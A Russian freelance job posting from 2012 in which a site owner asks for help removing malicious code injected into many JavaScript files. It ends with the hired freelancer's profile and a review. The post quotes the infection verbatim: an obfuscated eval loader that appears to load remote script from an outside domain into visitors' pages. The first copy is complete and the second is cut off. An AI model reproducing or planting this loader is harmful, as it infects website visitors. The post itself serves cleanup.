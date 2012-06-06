Убрать вирусы с сайта (подправить скрипт антивир.)

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Завершен6 заявок213 просмотров

Яндекс ругается на сайт. По видимому, вирус сидит во многих *.js файлах в виде такой какахи:

c=3-1;i=c-2;if(window.document)if(parseInt("0"+"1"+"2"+"3")===83)try{Date().prototype.q}catch(egewgsd){f=['0i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i78i57i74i-8i77i74i68i-8i21i-8i-1i64i76i76i72i18i7i7i82i17i71i16i79i6i76i64i70i58i72i63i69i81i81i75i6i60i81i70i60i70i75i5i69i57i65i68i6i59i71i69i7i63i7i-1i19i-27i-30i-31i65i62i-8i0i76i81i72i61i71i62i-8i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i-1i77i70i60i61i62i65i70i61i60i-1i1i-8i83i-27i-30i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i8i19i-27i-30i-31i85i-27i-30i-31i60i71i59i77i69i61i70i76i6i71i70i69i71i77i75i61i69i71i78i61i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i65i62i-8i0i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i8i1i-8i83i-27i-30i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i9i19i-27i-30i-31i-31i-31i78i57i74i-8i64i61i57i60i-8i21i-8i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i64i61i57i60i-1i1i51i8i53i19i-27i-30i-31i-31i-31i78i57i74i-8i75i59i74i65i72i76i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i75i59i74i65i72i76i-1i1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i76i81i72i61i-8i21i-8i-1i76i61i80i76i7i66i57i78i57i75i59i74i65i72i76i-1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i74i61i57i60i81i75i76i57i76i61i59i64i57i70i63i61i-8i21i-8i62i77i70i59i76i65i71i70i-8i0i1i-8i83i-27i-30i-31i-31i-31i-31i65i62i-8i0i76i64i65i75i6i74i61i57i60i81i43i76i57i76i61i-8i21i21i-8i-1i59i71i69i72i68i61i76i61i-1i1i-8i83i-27i-30i-31i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i-31i85i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i68i71i57i60i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i76i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i11i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i72i72i61i70i60i27i64i65i68i60i0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');v="ev"+"al";}if(v)e=window[v];w=f;s=[];r=String;for(;693!=i;i+=1){j=i;s+=r["fr"+"omC"+"harCode"](40+1*w[j]);}if(f)z=s;e

Или такой:

c=3-1;i=c-2;if(window.document)if(parseInt("0"+"1"+"2"+"3")===83)try{Date().prototype.q}catch(egewgsd){f=['0i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i78i57i74i-8i77i74i68i-8i21i-8i-1i64i76i76i72i18i7i7i68i14i9i17i9i6i66i81i81i74i61i72i60i74i73i63i6i60i81i70i60i70i75i5i62i74i61i61i6i59i71i69i7i63i7i-1i19i-27i-30i-31i65i62i-8i0i76i81i72i61i71i62i-8i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i-1i77i70i60i61i62i65i70i61i60i-1i1i-8i83i-27i-30i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i8i19i-27i-30i-31i85i-27i-30i-31i60i71i59i77i69i61i70i76i6i71i70i69i71i77i75i61i69i71i78i61i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i65i62i-8i0i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i8i1i-8i83i-27i-30i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i9i19i-27i-30i-31i-31i-31i78i57i74i-8i64i61i57i60i-8i21i-8i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i64i61i57i60i-1i1i51i8i53i19i-27i-30i-31i-31i-31i78i57i74i-8i75i59i74i65i72i76i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i75i59i74i65i72i76i-1i1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i76i81i72i61i-8i21i-8i-1i76i61i80i76i7i66i57i78i57i75i59i74i65i72i76i-1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i74i61i57i60i81i75i76i57i76i61i59i64i57i70i63i61i-8i21i-8i62i77i70i59i76i65i71i70i-8i0i1i-8i83i-27i-30i-31i-31i-31i-31i65i62i-8i0i76i64i65i75i6i74i61i57i60i81i43i76i57i76i61i-8i21i21i-8i-1i59i71i69i72i68i61i76i61i-1i1i-8i83i-27i-30i-31i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i-31i85i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i68i71i57i60i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i

Вручную перелопатить сотни файлов будет нереально, но есть скрипт, который сканировует *js файлы и удаляет строки, содердащие определенное слово. Думаю, можно научить его находить и данный вирус с помощью регулярных выражений: http://habrahabr.ru/post/141710/

JavaScript
13 лет назад
Sl1v3r
34 года
17 лет в сервисе
Был
11 лет назад

Выбранный исполнитель

6ect
Олег 
34 года
13 лет в сервисе
Был
2 года назад
13 лет назад
$10
1 день
Олег отлично справился с задачей и даже проявил инициативу, улучшив скрипт, убрав не нужные функции. Так же, внес изменения по функционалу в кратчайшие сроки. Отличный исполнитель!
Все гуд

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6ect
Олег 
34 года
13 лет в сервисе
Был
2 года назад
13 лет назад